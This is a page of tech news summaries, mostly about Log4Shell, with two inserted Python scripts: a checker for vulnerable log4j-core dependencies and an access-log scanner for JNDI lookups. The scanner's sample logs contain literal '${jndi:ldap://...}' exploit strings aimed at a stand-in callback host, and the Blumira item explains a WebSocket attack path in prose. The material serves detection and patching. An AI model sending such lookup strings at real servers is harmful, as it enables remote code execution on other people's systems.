Security

Belgian Defense Ministry Confirms Cyberattack Through Log4j Exploitation (zdnet.com)

An anonymous reader quotes a report from ZDNet: The Belgian Ministry of Defense has confirmed a cyberattack on its networks that involved the Log4j vulnerability. In a statement, the Defense Ministry said it discovered an attack on its computer network with internet access on Thursday. They did not say if it was a ransomware attack but explained that "quarantine measures" were quickly put in place to "contain the infected elements." "Priority was given to the operability of the network. Monitoring will continue. Throughout the weekend, our teams were mobilized to contain the problem, continue our operations and alert our partners," the Defense Ministry said. "This attack follows the exploitation of the Log4j vulnerability, which was made public last week and for which IT specialists around the world are jumping into the breach. The Ministry of Defense will not provide any further information at this stage."

Multiple reports from companies like Google and Microsoft have indicated that government hacking groups around the world are leveraging the Log4j vulnerability in attacks. [...] Centre for Cybersecurity Belgium spokesperson Katrien Eggers told ZDNet that they too sent out a warning to Belgian companies about the Apache Log4j software issue, writing that any organization that had not already taken action should "expect major problems in the coming days and weeks." "Because this software is so widely distributed, it is difficult to estimate how the discovered vulnerability will be exploited and on what scale," the Centre for Cybersecurity Belgium said, adding that any affected organizations should contact them. "It goes without saying that this is a dangerous situation."

Businesses

Inside Ubisoft's Unprecedented 'Exodus' of Developers (axios.com)

Colleagues across Ubisoft have names for the procession of developers who have departed over the past 18 months: "the great exodus" and "the cut artery." Across the company's global network of studios, which at 20,000-plus employees is one of gaming's largest workforces, many developers have decided it's time to quit. And many of their colleagues describe a flow of goodbyes that they've never seen before. Axios reports: Top-name talent is leaving, with at least five of the top 25-credited people from the company's biggest 2021 game, Far Cry 6, already gone. Twelve of the top 50 from last year's biggest Ubisoft release, Assassin's Creed Valhalla, have left too. (A 13th recently returned.) Also out are midlevel and lower-level workers as headcounts drop, particularly in Ubisoft's large and normally growing Canadian studios. LinkedIn shows Ubisoft's Montreal and Toronto studios each down at least 60 total workers in the last six months. Two current developers tell Axios the departures have stalled or slowed projects. One developer recently said a colleague currently at Ubisoft contacted them to solve an issue with a game, because no one was still there who knew the system.

Interviews with a dozen current and former Ubisoft developers cite a range of factors for the departures, including low pay, an abundance of competitive opportunities, frustration at the company's creative direction, and unease at Ubisoft's handling of a workplace misconduct scandal that flared in mid-2020. One developer with more than a decade of experience at Ubisoft before recently leaving said the company is "an easy target for recruiters," given the company's myriad issues. Said another now-former Ubisoft worker who was disappointed by directives from the company's Paris HQ: "There's something about management and creative scraping by with the bare minimum that really turned me away." Many spoke fondly of much of their time at the company, and one said they'd even consider returning, but the past year and a half was a breaking point.
"Management says it's on top of it, telling Axios that attrition is up but that the company has hired 2,600 workers since April," the report adds.

"A spokesperson noted that questions in a recent companywide survey, about whether employees are happy at the company and would 'recommend Ubisoft as a great place to work,' returned a score of 74, which they said was in line with the industry average."
Google

More Than 35,000 Java Packages Impacted by Log4j Vulnerabilities, Google Says (therecord.media)

Google's open-source team said they scanned Maven Central, today's largest Java package repository, and found that 35,863 Java packages use vulnerable versions of the Apache Log4j library. From a report: This includes Java packages that use Log4j versions vulnerable to the original Log4Shell exploit (CVE-2021-44228) and a second remote code execution bug discovered in the Log4Shell patch (CVE-2021-45046). James Wetter and Nicky Ringland, members of the Google Open Source Insights Team, said in a report today that when a major Java security flaw is found, it typically affects only 2% of the Maven Central index. However, the 35,000 Java packages vulnerable to Log4Shell account for roughly 8% of the Maven Central total of ~440,000, a percentage the two described using just one word -- "enormous." But since the vulnerability was disclosed last week, Wetter and Ringland said the community has responded positively and has already fixed 4,620 of the 35,863 packages they initially found vulnerable. This number accounts for 13% of all the vulnerable packages.
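Google's scan classifies packages by the Log4j version they depend on. As an added example that is not Google's Maven Central scanner nor code from the report, the following Python script applies the same idea to one project's `mvn dependency:list` output. The version thresholds encode only what this page states (2.0 through 2.14.1 hit by CVE-2021-44228, the 2.15.0 patch hit by CVE-2021-45046, 2.16.0 as the fix); the sample dependency list, the `com.example` artifact and the function names are constructed here.

```python
"""Flag Maven coordinates that pull in a Log4j 2 version affected by
CVE-2021-44228 (Log4Shell) or by CVE-2021-45046, the bug found in the 2.15.0 patch.
Added example: not Google's scanner; thresholds are the ones the article states."""
import re

LOG4J_GROUP = "org.apache.logging.log4j"
LOG4J_CORE = "log4j-core"  # the artifact that contains the JNDI lookup code

# Version tuples are (major, minor, patch, is_final) so that a pre-release such as
# 2.15.0-rc1 sorts below the final 2.15.0 release.
FIRST_FIXED = {
    "CVE-2021-44228": (2, 15, 0, 1),  # 2.0 .. 2.14.1 affected, per the article
    "CVE-2021-45046": (2, 16, 0, 1),  # 2.15.0 still affected; 2.16.0 is the fix
}
# Assumption: the 2.12.x backport line for older Java runtimes is not modelled;
# every 2.x version below the thresholds above is treated as affected.

VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:[-.]([A-Za-z][\w.]*))?$")


def parse_version(text):
    """Return (major, minor, patch, is_final), or None if the string is not a version."""
    m = VERSION_RE.match(text.strip())
    if not m:
        return None
    major, minor, patch, tag = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if tag else 1)


def assess(group_id, artifact_id, version):
    """Return the sorted list of CVE ids this coordinate is affected by ([] if none)."""
    if group_id != LOG4J_GROUP or artifact_id != LOG4J_CORE:
        return []
    parsed = parse_version(version)
    if parsed is None:
        return ["UNPARSEABLE-VERSION"]  # surface it rather than silently pass
    if parsed[0] != 2:
        return []  # Log4j 1.x is a different code base, outside this check
    return sorted(cve for cve, fixed in FIRST_FIXED.items() if parsed < fixed)


def parse_coordinate(token):
    """Accept 'g:a:v', 'g:a:type:v' and 'g:a:type:v:scope' (mvn dependency:list)."""
    parts = token.split(":")
    if len(parts) == 3:
        return parts[0], parts[1], parts[2]
    if len(parts) in (4, 5):
        return parts[0], parts[1], parts[3]
    return None


def scan_dependency_list(text):
    """Return [(group:artifact:version, [cves]), ...] for every affected coordinate."""
    findings = []
    for line in text.splitlines():
        tokens = line.split()
        if not tokens or ":" not in tokens[-1]:
            continue
        coord = parse_coordinate(tokens[-1])
        if coord is None:
            continue
        group_id, artifact_id, version = coord
        cves = assess(group_id, artifact_id, version)
        if cves:
            findings.append((f"{group_id}:{artifact_id}:{version}", cves))
    return findings


# Constructed sample in the format printed by `mvn dependency:list`.
SAMPLE_DEPENDENCY_LIST = """\
[INFO] The following files have been resolved:
[INFO]    org.apache.logging.log4j:log4j-api:jar:2.14.1:compile
[INFO]    org.apache.logging.log4j:log4j-core:jar:2.14.1:compile
[INFO]    com.example:internal-lib:jar:1.3.0:compile
"""

if __name__ == "__main__":
    for coordinate, cves in scan_dependency_list(SAMPLE_DEPENDENCY_LIST):
        print(f"{coordinate}: {', '.join(cves)}")
```

Only `log4j-core` is checked because that is the artifact carrying the lookup code; `log4j-api` at the same version is reported clean. A pre-release tag ranks below its final release, so a `2.15.0-rc1` dependency is still reported against both CVEs.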
Programming

Ruby on Rails Creator Touts 7.0 as One-Person Framework, 'The Way It Used To Be' (hey.com)

David Heinemeier Hansson is the creator of Ruby on Rails (as well as the co-founder and CTO of Basecamp, makers of the email software HEY). But he says Wednesday's release of version 7.0 is the version he's been longing for, "The one where all the cards are on the table. No more tricks up our sleeves. The culmination of years of progress on five different fronts at once." The backend gets some really nice upgrades, especially with the encryption work that we did for HEY, so your data can be encrypted while it's live in the database.... But it's on the front end things have made a quantum leap. We've integrated the Hotwire frameworks of Stimulus and Turbo directly as the new defaults, together with that hot newness of import maps, which means you no longer need to run the whole JavaScript ecosystem enchilada in your Ruby app...

The part that really excites me about this version, though, is how much closer it brings us to the ideal of The One Person Framework. A toolkit so powerful that it allows a single individual to create modern applications upon which they might build a competitive business. The way it used to be... Rails 7 seeks to be the wormhole that folds the time-learning-shipping-continuum, and allows you to travel grand distances without knowing all the physics of interstellar travel. Giving the individual rebel a fighting chance against The Empire....

The key engine powering this assault is conceptual compression. Like a video codec that throws away irrelevant details such that you might download the film in real-time rather than buffer for an hour. I dedicated an entire RailsConf keynote to the idea...

[I]f there ever was an opening, ever was a chance that we might at least tilt the direction of the industry, now is it.

What a glorious time to be working in web development.

Programming

Is Wolfram the Smartest Programming Language In the Room? (wolfram.com)

theodp writes: Out of the box, does your programming language support Chemical Formulas & Chemical Reactions? Making Videos from Images & Videos? Integrals? Real Numbers? Graph Trees? Leap Seconds? Bio Sequences? Flight Data? Vector Displacement Plots? Lighting? Machine Learning? Tracking Robots? Notebooks? Creating, Deploying and Grading Quizzes? Analysis of Email Threads? Access to 2,249 User-Defined Functions? NFTs?

These are just some of the feature upgrades Stephen Wolfram touched upon as he announced the launch of Version 13 of Wolfram Language and Mathematica in a Dec. 13th blog post (for more, see What's New in Mathematica 13). Sign up for free access to Wolfram Cloud Basic here, kids! So, is Wolfram the "smartest programming language in the room"?

Java

Security Firm Blumira Discovers Major New Log4j Attack Vector (zdnet.com)

Previously, one assumption about the 10 out of 10 Log4j security vulnerability was that it was limited to exposed vulnerable servers. We were wrong. The security company Blumira claims to have found a new, exciting Log4j attack vector. ZDNet reports: According to Blumira, this newly-discovered Javascript WebSocket attack vector can be exploited through the path of a listening server on their machine or local network. An attacker can simply navigate to a website and trigger the vulnerability. Adding insult to injury, WebSocket connections within the host can be difficult to gain deep visibility into. That means it's even harder to detect this vulnerability and attacks using it. This vector significantly expands the attack surface. How much so? It can be used on services running as localhost, which are not exposed to a network. This is what we like to call a "Shoot me now" kind of problem. Oh, and did I mention? The client itself has no direct control over WebSocket connections. They can silently start when a webpage loads. Don't you love the word "silently" in this context? I know I do.

In their proof-of-concept attack, Blumira found that, by using one of the many Java Naming and Directory Interface (JNDI) exploits, they could trigger via a file path URL using a WebSocket connection to machines with an installed vulnerable Log4j2 library. All that was needed to trigger success was a path request that was started on the web page load. Simple, but deadly. Making matters worse, it doesn't need to be localhost. WebSockets allow for connections to any IP. Let me repeat, "Any IP" and that includes private IP space.

Next, as the page loads, it will initiate a local WebSocket connection, hit the vulnerable listening server, and connect out over the identified type of connection based on the JNDI connection string. The researchers saw the most success utilizing Java Remote Method Invocation (RMI), default port 1099, although we are often seeing custom ports used. Simply port scanning, a technique already in the WebSocket hacker handbook, was the easiest path to a successful attack. Making detecting such attacks even harder, the company found "specific patterns should not be expected as it is easy to trigger traffic passively in the background." Then, once an open port to a local service or a service accessible to the host is found, it can drop the JNDI exploit string in path or parameters. "When this happens, the vulnerable host calls out to the exploit server, loads the attacker's class, and executes it with java.exe as the parent process." Then the attacker can run whatever he wants.
Blumira suggests users "update all local development efforts, internal applications, and internet-facing environments to Log4j 2.16 as soon as possible, before threat actors can weaponize this exploit further," reports ZDNet.

"You should also look closely at your network firewall and egress filtering. [...] In particular, make sure that only certain machines can send out traffic over 53, 389, 636, and 1099 ports. All other ports should be blocked." The report continues: "Finally, since weaponized Log4j applications often attempt to call back home to their masters over random high ports, you should block their access to such ports."
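Blumira's advice above comes down to two controls: patch, and restrict egress on ports 53, 389, 636 and 1099 with everything else blocked. As an added example, not Blumira's or ZDNet's code, the Python scanner below finds literal `${jndi:...}` lookup strings in the request path or parameters of web server access logs (the two placements the article names), maps each hit to the port the lookup would call out on, and classifies it against that egress policy so an analyst can see which callbacks the port block alone would stop and which rely on the per-machine restriction. The log lines, the `callback.example` host and the function names are constructed for this example.

```python
"""Find Log4j JNDI lookup strings in web server access logs and map each hit to the
outbound port the lookup would use. Added example (not Blumira's or ZDNet's code);
the log lines and the callback.example host are constructed."""
import re
from urllib.parse import unquote

# Default ports of the JNDI transports named in the article's egress advice.
JNDI_DEFAULT_PORTS = {"dns": 53, "ldap": 389, "ldaps": 636, "rmi": 1099}

# Matches the literal ${jndi:<scheme>://<host>[:port] form. Production detections
# should also canonicalise Log4j's nested lookup syntax before matching; that is
# beyond this example.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*//(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)


def find_jndi_lookups(line):
    """Return one dict per lookup string found in the line (URL-decoded first, so a
    percent-encoded request path is matched as well)."""
    hits = []
    for m in JNDI_RE.finditer(unquote(line)):
        scheme = m.group("scheme").lower()
        port = int(m.group("port")) if m.group("port") else JNDI_DEFAULT_PORTS.get(scheme)
        hits.append({"scheme": scheme, "host": m.group("host"), "port": port,
                     "raw": m.group(0)})
    return hits


def scan_log(lines):
    """Scan an iterable of log lines; return findings tagged with 1-based line numbers."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        for hit in find_jndi_lookups(line):
            hit["line_no"] = line_no
            findings.append(hit)
    return findings


def callback_ports(findings):
    """Sorted set of outbound ports the observed lookups would use."""
    return sorted({f["port"] for f in findings if f["port"] is not None})


def classify_against_egress(findings, permitted_ports):
    """Split findings by the article's policy: only the listed ports are open, and only
    for certain machines; everything else is blocked. A callback on an unlisted port
    is stopped by the port rule alone ('blocked'); one on a listed port depends on the
    per-machine restriction and needs a look ('review')."""
    return {
        "blocked": [f for f in findings if f["port"] not in permitted_ports],
        "review": [f for f in findings if f["port"] in permitted_ports],
    }


# Constructed access-log lines: a clean request, a lookup in a query parameter,
# a lookup in the request path, and a percent-encoded lookup in the path.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.9 - - [13/Dec/2021:10:01:07 +0000] "GET /login?user=${jndi:ldap://callback.example:1389/x} HTTP/1.1" 200 33',
    '10.0.0.9 - - [13/Dec/2021:10:01:09 +0000] "GET /${jndi:rmi://callback.example/y} HTTP/1.1" 404 12',
    '10.0.0.9 - - [13/Dec/2021:10:01:11 +0000] "GET /%24%7Bjndi%3Aldaps%3A%2F%2Fcallback.example%2Fz%7D HTTP/1.1" 404 12',
]

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"line {f['line_no']}: {f['scheme']} -> {f['host']}:{f['port']}")
    print("callback ports seen:", callback_ports(found))
    split = classify_against_egress(found, {53, 389, 636, 1099})
    print("blocked by port rule:", [f["line_no"] for f in split["blocked"]])
    print("needs per-machine review:", [f["line_no"] for f in split["review"]])
```

On the sample, the LDAP callback on custom port 1389 is stopped by the "all other ports blocked" rule, while the RMI (1099) and LDAPS (636) callbacks land on permitted ports and only the "certain machines" restriction decides whether they get out; that is the case the article's second sentence is about.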
Programming

Apple Releases Swift Playgrounds 4 (techcrunch.com)

Apple announced that it has officially released Swift Playgrounds 4. The tech giant first announced the upcoming launch of the new software at WWDC earlier this year. From a report: With this latest launch, the software now lets users build iPhone and iPad apps with SwiftUI directly on their iPad. It also allows you to preview apps in real time as you make changes to your app. Apple notes that developers are now able to upload their finished app to the App Store with its "App Store Connect" integration. "Swift Playgrounds is the best and easiest way to learn how to code," Apple said in a blog post. "Code is immediately reflected in the live preview as you build apps, and you can run your apps full screen to test them out. A new open project format based on Swift packages can be opened and edited in Swift Playgrounds for iPad, as well as within Xcode on Mac, offering you even more versatility to develop apps across iPad and Mac."
Programming

At EA, It Can Take a Whole Day To Change 3 Lines of Code (neowin.net)

New submitter segaboy81 writes: In 2001 the Manifesto for Agile Software Development was born, and it took the software engineering world by storm. Linux, Windows, Facebook, AAA games, and just about everything else, adheres to this manifesto in some form or another. It is a paradigm that allows teams to work collaboratively on projects in the most effective and streamlined way possible. However, EA may not have gotten the memo. According to a blogpost by former EA developer Adam Berg, different teams take very different approaches to development with one team in particular being especially slow to progress. Adam recounts his experience on the FIFA team where he worked on the Wii, PS Vita, and Nintendo 3DS ports of the game: "I often worked in the realm of competition logic. Testing changes here could mean progressing through several seasons of career mode in order to test out a change. No joke, it would take an entire day to change 3 lines of code and know that it actually worked correctly."
Programming

The Linux Kernel's Second Language? Rust Gets Another Step Closer (phoronix.com)

"In 2022 we will very likely see the experimental Rust programming language support within the Linux kernel mainlined," writes Phoronix, citing patches sent out Monday "introducing the initial support and infrastructure around handling of Rust within the kernel."

This summer saw the earlier patch series posted for review and discussion around introducing Rust programming language support in the Linux kernel to complement its longstanding C focus. In the months since there has been more progress on enabling Rust for the Linux kernel development, Linus Torvalds is not opposed to it, and others getting onboard with the effort. Rust for the Linux kernel remains of increasing interest to developers over security concerns with Rust affording more memory safety protections, potentially lowering the barrier to contributing to the kernel, and other related benefits....

Miguel Ojeda sent out the "v2" patches for Rust support in the kernel. With these updated packages, the Rust code is now relying on stable Rust releases rather than the beta compiler state previously, new modularization options added, stricter code enforcements, extra Rust compiler diagnostics enabled, new abstractions for in-kernel use, and other low-level code improvements.

Red Hat is also now joining Arm, Google, and Microsoft in voicing their support for Rust code within the Linux kernel.

ZDNet contributing editor Steven J. Vaughan-Nichols also expects the first Rust code in Linux's kernel sometime in 2022: As Ryan Levick, a Microsoft principal cloud developer advocate, explained, "Rust is completely memory safe." Since roughly two-thirds of security issues can be traced back to handling memory badly, this is a major improvement. In addition, "Rust prevents those issues usually without adding any runtime overhead," Levick said.
Java

New Zero-Day In the Log4j Java Library Is Already Being Exploited (zdnet.com)

A newly discovered zero-day vulnerability in the widely used Java logging library Apache Log4j is easy to exploit and enables attackers to gain full control of affected servers. ZDNet reports: Tracked as CVE-2021-44228, the vulnerability is classed as severe and allows unauthenticated remote code execution as the user running the application utilizes the Java logging library. CERT New Zealand warns that it's already being exploited in the wild. CISA has urged users and administrators to apply the recommended mitigations "immediately" in order to address the critical vulnerabilities. Systems and services that use the Java logging library, Apache Log4j between versions 2.0 and 2.14.1 are all affected, including many services and applications written in Java. The vulnerability was first discovered in Minecraft but researchers warn that cloud applications are also vulnerable. It's also used in enterprise applications and it's likely that many products will be found to be vulnerable as more is learned about the flaw. Slashdot reader alfabravoteam shares an excerpt from a blog post by researchers at LunaSec, warning that "anybody using Apache Struts is likely vulnerable." From the report: Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We're calling it "Log4Shell" for short (CVE-2021-44228 just isn't as memorable). The 0-day was tweeted along with a POC posted on GitHub. [...] This has been published as CVE-2021-44228 now.

Many, many services are vulnerable to this exploit. Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable. Anybody using Apache Struts is likely vulnerable. We've seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach. Many Open Source projects like the Minecraft server, Paper, have already begun patching their usage of log4j [to log4j-2.15.0-rc1].

Programming

Which Developers Were Paid the Most in 2021? (infoworld.com)

InfoWorld reports this year's highest-paying software developer roles according to Robert Half's 2022 Salary Guide (which uses research conducted this summer on America's average salary range for the 50th and 75th percentile of applicants): The highest paying non-C-suite role in 2021 is the cloud architect. Organizations are looking for talented engineers to guide their digital transformation efforts.

Cloud/network architect: $153,750-$180,500
Applications architect: $150,500-$180,250

Software developer job titles have proliferated in recent years, and there is a clear need for mobile and applications developers, who get paid on average far better than their colleagues still working on mainframes.

Software and applications manager: $142,500-$166,250
Mobile applications developer: $137,250-$163,750
Senior software engineer: $135,250-$162,250
Software engineer: $124,500-$147,250
Software developer: $122,250-$142,750
Developer/programmer analyst: $112,500-$133,750

Developers responsible solely for web applications get paid on a slightly different scale than standard software developer job titles.

Senior web developer: $128,750-$151,000
Web developer: $111,000-$131,500
Front-end developer: $93,250-$107,750

The salary guide's web page also offers a search form that lets you adjust salaries to selected cities (also showing what the lower salaries would be in the 25th percentile for applicants new to the role and still acquiring relevant skills).

The page calls tech-sector recruiting "especially active," with employers hiring tech professionals "at or beyond pre-pandemic levels." In fact, 52% of tech employers said they were adding new positions, with 49% offering signing bonuses to new employees, and hiring is especially strong in areas like cloud services, AI/machine learning, and data analysis.

One perk being offered more frequently by tech-oriented businesses: unlimited time off.
Christmas Cheer

'Advent of Code' Has Begun - and Other Geeky Daily Programming Challenges (i-programmer.info)

I Programmer writes: December 1st is much anticipated among those who like programming puzzles. It is time to start collecting stars by solving small puzzles on the Advent of Code website with the goal of amassing 50 stars by Christmas Day, December 25th. Raku has also opened its advent calendar and there's a brand new Bekk Christmas blog with informational content on multiple topics... At the time of writing, only 10.5 hours into Advent of Code's Day 1, almost 50,000 users have completed both puzzles and another 8,484 have completed the first. [Some programmers are even livestreaming their progress on Twitch, or sharing their thoughts (and some particularly creative solutions) in the Advent of Code subreddit.]

We can credit Perl with pioneering the idea of a programming advent calendar with daily articles with a festive theme, and the Raku Advent Calendar now continues the tradition. Now in its 13th year, but only the third with its new name, this year's first advent post solves a problem faced by Santa of creating thumbnails of approaching 2 billion images...

Smashing magazine has pulled together its own exhaustive list of additional geek-themed advent calendars. Some of the other highlights:
  • The beloved site "24 Pull Requests" has relaunched for 2021, daring participants to make 24 pull requests before December 24th. (The site's tagline is "giving back to open source for the holidays.") Over the years 26,465 contributors (as well as 25,738 organizations) have already participated through the site.
  • The Advent of JavaScript and Advent of CSS sites promise 24 puzzles delivered by email (though you'll have to pay if you also want them to email you the solutions!)

Programming

JetBrains Announces 'Fleet' IDE to Compete with Microsoft's Visual Studio Code (jetbrains.com)

On Monday JetBrains (creators of the Kotlin programming language and makers of the integrated development environment IntelliJ IDEA) made an announcement: a preview for a lightweight new multi-language IDE called Fleet using IntelliJ's code-processing engine with a distributed IDE architecture and a reimagined UI.

By Friday they'd received an "overwhelming" number of requests, and announced the preview program had stopped accepting new requests. ("To subscribe for updates and the public preview announcement at jetbrains.com/fleet or follow @JetBrains_Fleet on Twitter.")

They'd received 80,000 requests in just the first 30 hours, reports Visual Studio magazine: Although JetBrains didn't even mention VS Code in its Nov. 28 announcement, many media pundits immediately characterized it along the lines of an "answer to Visual Studio Code," a "response to Visual Studio Code," a "competitor to Visual Studio Code" and so on...

"When you first launch Fleet, it starts up as a full-fledged editor that provides syntax highlighting, simple code completion, and all the things you'd expect from an editor," JetBrains said. "But wait, there's more! Fleet is also a fully functional IDE bringing smart completion, refactorings, navigation, debugging, and everything else that you're used to having in an IDE — all with a single button click."

"It starts up in an instant so you can begin working immediately..." boasts the Fleet web page, adding that Fleet "is designed to automatically detect your project configuration from the source code, maximizing the value you get from its smart code-processing engine while minimizing the need to configure the project in the IDE." And it also offers "project and context aware code completion, navigation to definitions and usages, on-the-fly code quality checks, and quick-fixes..."

Fleet also offers a collaborative environment allowing developers to work together — not just sharing the editor, but also terminals and debugging sessions. (There's even a diff view for reviewing changes.) "Others can connect to a collaboration session you initiate on your machine, or everyone can connect to a shared remote dev environment," explains Fleet's web page. "It supports a number of remote work scenarios and can be run locally on the developer's computer, in the cloud, or on a remote server," reports SD Times. (And Fleet's home page says soon it will even run in Docker containers configured with an appropriate environment for your project.)

SD Times adds that Fleet "currently supports Java, Kotlin, Go, Python, Rust, and JavaScript. The company plans to extend support to cover PHP, C++, C#, and HTML, which are the remaining languages that have IntelliJ IDEs." It's multi-platform — running on Linux, MacOS, or Windows — and Fleet's web page promises "a familiar and consistent user experience" offering one IDE for the many different technologies you might end up using.

And yes, there's a dark theme.
IT

Stripe is On a Hiring Spree. But It's Also Rescinding Job Offers and Angering Engineers. (protocol.com)

The prevailing narrative about tech workers assumes that they have more power than ever before. This even has a term -- the Great Resignation. But at the booming, much-revered payments company Stripe, some applicants have found themselves accepting job offers only to learn they have been rescinded without warning. From a report: Protocol spoke with two Stripe candidates who received either verbal or written offers from the company and then had those offers revoked because of "shifting business priorities." (We reviewed their communications with Stripe recruiters, including the offer letter, to confirm the candidates' stories). Protocol also spoke with a former Stripe recruiter who described the company as embracing a "hire and fire" mentality and constantly shifting priorities and reorganizing staff. All three of these sources were granted anonymity for fear of repercussions by their current and potential future employers. Protocol also reviewed multiple online complaints detailing similar rescinded offers; the most prominent of these complaints was posted on Hacker News and received a rousing defense of Stripe from Coinbase CEO Brian Armstrong.

"We want everyone who interacts with Stripe during a recruiting process to be treated professionally and with respect. We value feedback and are always looking for ways to improve our recruiting experience," a Stripe spokesperson wrote to Protocol. Stripe, which has the highest valuation of any private, venture-backed tech company in the U.S., has grown so rapidly over the last few years that many engineers and other tech workers see it as one of the most desirable, successful places to work. The former recruiter interviewed by Protocol said that she chose the job over offers at Google and two other tech companies, in part because of the extremely positive and enthusiastic way the company was sold to her and because of Stripe's reputation in the industry.

Open Source

Addressing 'Bus Factor', PHP Gets a Foundation (thenewstack.io)

How many members of your team are so irreplaceable that if they were hit by a bus, your project would grind to a halt?

For PHP, that number is: two. (According to a post by PHP contributor Joe Watkins earlier this year that's now being cited in Mike Melanson's "This Week in Programming" column.) "Maybe as few as two people would have to wake up this morning and decide they want to do something different with their lives in order for the PHP project to lack the expertise and resources to move it forward in its current form, and at current pace," Watkins wrote at the time, naming Dmitry Stogov and Nikita Popov as those two. Well, last week, Nikita Popov was thankfully not hit by a bus, but he did decide to move on from his role with PHP to instead focus his activities on LLVM.

Also thankfully, Watkins' article earlier this year opened some eyes to the situation at hand and, as he writes in a follow-up article this week, JetBrains (Popov's employer) reached out to him at the time regarding starting a PHP Foundation. This week, with Popov's departure, the PHP Foundation was officially launched with the goal of funding part/full-time developers to work on the PHP core in 2022. At launch, the PHP Foundation will count 10 companies — Automattic, Laravel, Acquia, Zend, Private Packagist, Symfony, Craft CMS, Tideways, PrestaShop, and JetBrains — among its backers, with an expectation to raise $300,000 per year, and with JetBrains contributing $100,000 annually. Alongside that, the foundation is being launched using foundation-as-a-service provider Open Collective, and just under 700 contributors have already raised more than $40,000 for the foundation.

One of the key benefits to creating a foundation, rather than sticking with the status quo, goes beyond increasing the bus factor — it diversifies the influences on PHP. Watkins points out that, for much of the history of PHP, Zend, the employer of Dmitry Stogov, has been a primary financial backer, and as such has had some amount of influence on the language's direction. Similarly, JetBrains had increased influence during its time employing Popov on PHP. "To say they have not influenced the direction of the language as a whole would just not be true...." While Watkins says that everything has been above board and gone through standard processes to ensure so, influence is nonetheless indisputable, and that "The Foundation represents a new way to push the language forward..."

The current RFC process, JetBrains writes, "will not change, and language decisions will always be left to the PHP Internals community."

And in addition, Watkins adds, "It provides us the mechanism by which to raise the bus factor, so that we never face the problems we face today, and have faced in the past."
Programming

Rust's Moderation Team Resigns to Protest 'Unaccountable' Core Team (thenewstack.io)

On Monday morning the moderation team for the Rust programming language "resigned effective immediately," reports The New Stack: The resignation was tendered via a pull request on GitHub, wherein team member Andrew Gallant wrote that the team resigned "in protest of the Core Team placing themselves unaccountable to anyone but themselves."

According to the page describing Rust governance, the moderation team's purpose is to do just that — to help "uphold the code of conduct and community standards" — and according to the resignation letter, they are unable to do so, with the Core Team seemingly being outside of those bounds. "As a result of such structural unaccountability, we have been unable to enforce the Rust Code of Conduct to the standards the community expects of us and to the standards we hold ourselves to," Gallant continues, before making four specific recommendations to the Rust community as to how to move forward.

First, Gallant writes that the Rust community should "come to a consensus on a process for oversight over the Core Team," which he says is currently "answerable only to themselves." Next, the outgoing team recommends that the "replacement for the Mod Team be made by Rust Team Members not on the Core Team," and that this future team "with advice from Rust Team Members, proactively decide how best to handle and discover unhealthy conflict among Rust Team Members," with "professional mediation" also suggested. The final point, which they say is unrelated, is that the next team should "take special care to keep the team of a healthy size and diversity, to the extent possible," something they failed to do themselves. To that point, the outgoing team is just three members, Andre Bogus, Andrew Gallant, and Matthieu M...

The former team concludes their resignation letter, writing that "we have avoided airing specific grievances beyond unaccountability" because they are choosing "to maintain discretion and confidentiality" and that the Rust community and their replacements "exercise extreme skepticism of any statements by the Core Team (or members thereof) claiming to illuminate the situation."

"Our relationship with Core has been deteriorating for months," they add in a thread on Reddit (where the subReddit's moderators have since locked out comments "in light of the volatile nature of this thread.")

There's just one more official update. On Thursday, former Rust moderation team member Andrew Gallant tweeted the URL to a new post that has now appeared on the "Inside Rust blog," titled "In response to the moderation team resignation." The post reads: As top-level team leads, project directors to the Foundation, and core team members, we are actively collaborating to establish next steps after the statement from the Rust moderation team. While we are having ongoing conversations to share perspectives on the situation, we'd like to collectively state that we are all committed to the continuity and long term health of the project.

Updates on next steps will be shared with the project and wider community over the next few weeks. In the meantime, we are grateful to the interim moderators who have stepped up to provide moderation continuity to the project.

Programming

GitHub Fixes a Private-Package-Names Leak and Serious Authorization Bug (bleepingcomputer.com) 21

In 2020 Microsoft's GitHub acquired NPM (makers of the default package manager for Node.js). The company's web page boasts that npm "is a critical part of the JavaScript community and helps support one of the largest developer ecosystems in the world."

But now BleepingComputer reports on two security flaws found (and remediated) in its software registry. Names of private npm packages on npmjs.com's 'replica' server (consumed by third-party services) were leaked — but in addition, a second flaw could've allowed attackers "to publish new versions of any existing npm package that they do not own or have rights to, due to improper authorization checks."

In a blog post this week GitHub's chief security officer explained the details: During maintenance on the database that powers the public npm replica at replicate.npmjs.com, records were created that could expose the names of private packages. This briefly allowed consumers of replicate.npmjs.com to potentially identify the names of private packages due to records published in the public changes feed. No other information, including the content of these private packages, was accessible at any time. Package names in the format of @owner/package for private packages created prior to October 20 were exposed between October 21 13:12:10Z UTC and October 29 15:51:00Z UTC. Upon discovery of the issue, we immediately began work on implementing a fix and determining the scope of the exposure. On October 29, all records containing private package names were removed from the replication database. While these records were removed from the replicate.npmjs.com service on this date, the data on this service is consumed by third-parties who may have replicated the data elsewhere. To prevent this issue from occurring again, we have made changes to how we provision this public replication database to ensure records containing private package names are not generated during this process.

Second, on November 2 we received a report to our security bug bounty program of a vulnerability that would allow an attacker to publish new versions of any npm package using an account without proper authorization. We quickly validated the report, began our incident response processes, and patched the vulnerability within six hours of receiving the report.

We determined that this vulnerability was due to inconsistent authorization checks and validation of data across several microservices that handle requests to the npm registry. In this architecture, the authorization service was properly validating user authorization to packages based on data passed in request URL paths. However, the service that performs underlying updates to the registry data determined which package to publish based on the contents of the uploaded package file. This discrepancy provided an avenue by which requests to publish new versions of a package would be authorized for one package but would actually be performed for a different, and potentially unauthorized, package. We mitigated this issue by ensuring consistency across both the publishing service and authorization service to ensure that the same package is being used for both authorization and publishing.

